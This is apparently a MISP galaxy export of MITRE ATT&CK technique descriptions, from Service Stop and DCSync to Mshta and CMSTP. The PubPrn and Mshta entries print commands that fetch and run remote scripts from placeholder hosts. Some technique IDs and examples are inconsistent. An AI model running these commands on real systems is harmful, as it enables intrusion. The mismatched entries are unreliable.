Adversaries may accomplish this by disabling individual services of high importance to an organization, such as `<code>MSExchangeIS</code>`, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data
Encrypted for Impact on the data stores of services like Exchange and SQL Server. (Citation: SecureWorks WannaCry Analysis)

The tag is: `misp-galaxy:mitre-attack-pattern="Service Stop - T1489"

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**Data Manipulation - T1565**

Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: `misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565"

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**Native Code - T1575**

Adversaries may use Android's Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.

The NDK allows developers to write native code in C or C++ that is compiled directly to machine code, avoiding all intermediate languages and steps in compilation that higher level languages, like Java, typically have. The Java Native Interface (JNI) is the component that allows Java functions in the Android app to call functions in a native library. (Citation: Google NDK Getting Started)

Adversaries may also choose to use native functions to execute malicious code since native actions are typically much more difficult to analyze than standard, non-native behaviors. (Citation: MITRE App Vetting Effectiveness)
Establish Accounts - T1585

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage)

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). (Citation: Mandiant APT1)

The tag is: *misp-galaxy:mitre-attack-pattern="Establish Accounts - T1585"*

Active Scanning - T1595

Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via
network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.

Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP. Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)).

The tag is: *misp-galaxy:mitre-attack-pattern="Active Scanning - T1595"

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**Compromise Accounts - T1586**

Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.

A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.

Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.

Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).

The tag is: *misp-galaxy:mitre-attack-pattern="Compromise Accounts - T1586"

**Table 3774. Table References**
Dynamic Resolution - T1568

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568"

System Services - T1569

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:mitre-attack-pattern="System Services - T1569"
Develop Capabilities - T1587

Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)

As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.

The tag is: misp-galaxy:mitre-attack-pattern="Develop Capabilities - T1587"

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Obtain Capabilities - T1588

Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.

In addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)

In addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588"
Man-in-the-Middle - T1557

Adversaries may attempt to position themselves between two or more networked devices using a man-in-the-middle (MiTM) technique to support follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.(Citation: Rapid7 MiTM Basics)

Adversaries may leverage the MiTM position to attempt to modify traffic, such as in [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002). Adversaries can also stop traffic from flowing to the appropriate destination, causing denial of service.

The tag is: `misp-galaxy:mitre-attack-pattern="Man-in-the-Middle - T1557"`

Add-ins - T1137.006

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)

Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.

The tag is: `misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006"`
**Regsvcs/Regasm - T1218.009**

Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)

Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: `<code>[/ComRegisterFunction]` or `<code>[/ComUnregisterFunction]` respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs) (Citation: LOLBAS Regasm)

The tag is: `misp-galaxy:mitre-attack-pattern="Regsvcs/Regasm - T1218.009"`

**Steganography - T1001.002**

Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.

The tag is: `misp-galaxy:mitre-attack-pattern="Steganography - T1001.002"`
NTDS - T1003.003

Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in `<code>%SystemRoot%\NTDS\Ntds.dit</code>` of a domain controller. (Citation: Wikipedia Active Directory)

In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information. (Citation: Metcalf 2015)

The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.

- Volume Shadow Copy
- secretsdump.py
- Using the in-built Windows tool, ntdsutil.exe
- Invoke-NinjaCopy

The tag is: `misp-galaxy:mitre-attack-pattern="NTDS - T1003.003"`

DCSync - T1003.006

Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.

Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in
turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) (Citation: Harmj0y Mimikatz and DCSync) or change an account’s password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017)

DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: GitHub Mimikatz Lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)

The tag is: `misp-galaxy:mitre-attack-pattern="DCSync - T1003.006"`

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**Timestomp - T1070.006**

Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.

Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)

The tag is: `misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006"`

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**SSH - T1021.004**

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into remote machines using Secure Shell (SSH). The adversary may then perform actions as the logged-on user.

SSH is a protocol that allows authorized users to open remote shells on other computers. Many Linux and macOS versions come with SSH installed by default, although typically disabled until the user enables it. The SSH server can be configured to use standard password authentication or public-private keypairs in lieu of or in addition to a password. In this authentication scenario, the user's public key must be in a special file on the computer running the server that lists which keypairs are allowed to login as that user. (Citation: SSH Secure Shell)

The tag is: `misp-galaxy:mitre-attack-pattern="SSH - T1021.004"`

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**VNC - T1021.005**

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.

VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.

The tag is: `misp-galaxy:mitre-attack-pattern="VNC - T1021.005"`

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**DNS - T1071.004**

Adversaries may communicate using the Domain Name System (DNS) application layer protocol to
avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.

The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. (Citation: PAN DNS Tunneling) (Citation: Medium DnsTunneling)

The tag is: `misp-galaxy:mitre-attack-pattern="DNS - T1071.004"`

### Table 3788. Table References

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### Keylogging - T1056.001

Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.

Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes. (Citation: Adventures of a Keystroke) Some methods include:

- Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- Reading raw keystroke data from the hardware buffer.
- Windows Registry modifications.
- Custom drivers.
- [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"`

### Table 3789. Table References
PowerShell - T1095.001

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).

PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.

A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)

PowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell’s underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)

The tag is: misp-galaxy:mitre-attack-pattern="PowerShell - T1095.001"

Table 3790. Table References

Links

- https://attack.mitre.org/techniques/T1059/001
- https://github.com/jaredhaight/PSAttack
- http://www.sixdub.net/?p=367
- https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
- https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
Steganography - T1027.003

Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.

[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim’s system and hid it within an image before exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu)

By the end of 2017, a threat group used `<code>Invoke-PSImage</code>` to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim’s system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim’s machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)

The tag is: **misp-galaxy:mitre-attack-pattern="Steganography - T1027.003"**

**Table 3791. Table References**

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AppleScript - T1059.002

Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.

Scripts can be run from the command-line via `<code>osascript /path/to/script</code>` or `<code>osascript -e "script here"</code>`. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding `<code>#!/usr/bin/osascript</code>` to the start of the script file. (Citation: SentinelOne AppleScript)

AppleScripts do not need to call `<code>osascript</code>` to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106) `<code>NSAppleScript</code>` or `<code>OSAScript</code>`, both of
which execute code independent of the `usr/bin/osascript` command line utility.

Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106), which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)

The tag is: `misp-galaxy:mitre-attack-pattern="AppleScript - T1059.002"`

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**DNS - T1590.002**

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target's subdomains, mail servers, and other hosts.

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: `misp-galaxy:mitre-attack-pattern="DNS - T1590.002"`

**Table 3793. Table References**

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1712
Cron - T1053.003

Adversaries may abuse the `<code>cron</code>` utility to perform task scheduling for initial or recurring execution of malicious code. The `<code>cron</code>` utility is a time-based job scheduler for Unix-like operating systems. The `<code>crontab</code>` file contains the schedule of cron entries to be run and the specified times for execution. Any `<code>crontab</code>` files are stored in operating system-specific file paths.

An adversary may use `<code>cron</code>` in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. `<code>cron</code>` can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.

The tag is: `misp-galaxy:mitre-attack-pattern="Cron - T1053.003"`

Launchd - T1053.004

Adversaries may abuse the `<code>Launchd</code>` daemon to perform task scheduling for initial or recurring execution of malicious code. The `<code>launchd</code>` daemon, native to macOS, is responsible for loading and maintaining services within the operating system. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in `<code>/System/Library/LaunchDaemons</code>` and `<code>/Library/LaunchDaemons</code>` (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

An adversary may use the `<code>launchd</code>` daemon in macOS environments to schedule new executables to run at system startup or on a scheduled basis for persistence. `<code>launchd</code>` can also be abused to run a process under the context of a specified account. Daemons, such as `<code>launchd</code>`, run with the permissions of the root user account, and will operate regardless of which user account is logged in.

The tag is: `misp-galaxy:mitre-attack-pattern="Launchd - T1053.004"`
Python - T1059.006

Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the `<code>python.exe</code>` interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.

Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.

The tag is: `misp-galaxy:mitre-attack-pattern="Python - T1059.006"

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JavaScript - T1059.007

Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)

JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScirp May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts)

JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple's Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple's OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple's internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility `<code>osascript</code>`, they can be compiled into applications or script files via `<code>osacompile</code>`, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode)

Adversaries may abuse various implementations of JavaScript to execute various behaviors.
Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).

The tag is: *misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007"*

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### Regsvr32 - T1218.010

Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
Confluence - T1213.001

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:

- Policies, procedures, and standards
- Physical / logical network diagrams
- System architecture diagrams
- Technical system documentation
- Testing / development credentials
- Work / project schedules
- Source code snippets
- Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Confluence - T1213.001"

PubPrn - T1216.001

Adversaries may use the trusted PubPrn script to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application control solutions that do not account for use of these scripts.

<code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and can be used to proxy execution from a
remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is `<code>cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn\.[vbs 127.0.0.1 script:http://192.168.1.100/hi.png</code>.

The tag is: *misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001”*

**Table 3800. Table References**

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**MSBuild - T1127.001**

Adversaries may use MSBuild to proxy execution of code through a trusted Windows utility. MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It handles XML formatted project files that define requirements for loading and building various platforms and configurations.(Citation: MSDN MSBuild)

Adversaries can abuse MSBuild to proxy execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file.(Citation: MSDN MSBuild)(Citation: Microsoft MSBuild Inline Tasks 2017) MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application control defenses that are configured to allow MSBuild.exe execution.(Citation: LOLBAS Msbuild)

The tag is: *misp-galaxy:mitre-attack-pattern="MSBuild - T1127.001”*

**Table 3801. Table References**

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**Sharepoint - T1213.002**

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

- Policies, procedures, and standards
- Physical / logical network diagrams
• System architecture diagrams
• Technical system documentation
• Testing / development credentials
• Work / project schedules
• Source code snippets
• Links to network shares and other internal resources

The tag is: misp-galaxy:mitre-attack-pattern="Sharepoint - T1213.002"

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CMSTP - T1218.003

Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.

Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.

CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate App Locker Bypass List) (Citation: Endurant CMSTP July 2018)

The tag is: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003"

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InstallUtil - T1218.004

Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil)

InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system:
<code>C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe</code> and <code>C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe</code>.

InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)

The tag is: misp-galaxy:mitre-attack-pattern="InstallUtil - T1218.004"

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Mshta - T1218.005

Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)

Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload[.]sct")"))</code>

They may also be executed directly from URLs: <code>mshta http://webserver/payload[.]hta</code>
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)

The tag is: **misp-galaxy:mitre-attack-pattern="Mshta - T1218.005"**

**Table 3805. Table References**

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<td><a href="https://lolbas-project.github.io/lolbas/Binaries/Mshta/">https://lolbas-project.github.io/lolbas/Binaries/Mshta/</a></td>
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**Hardware - T1592.001**

Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

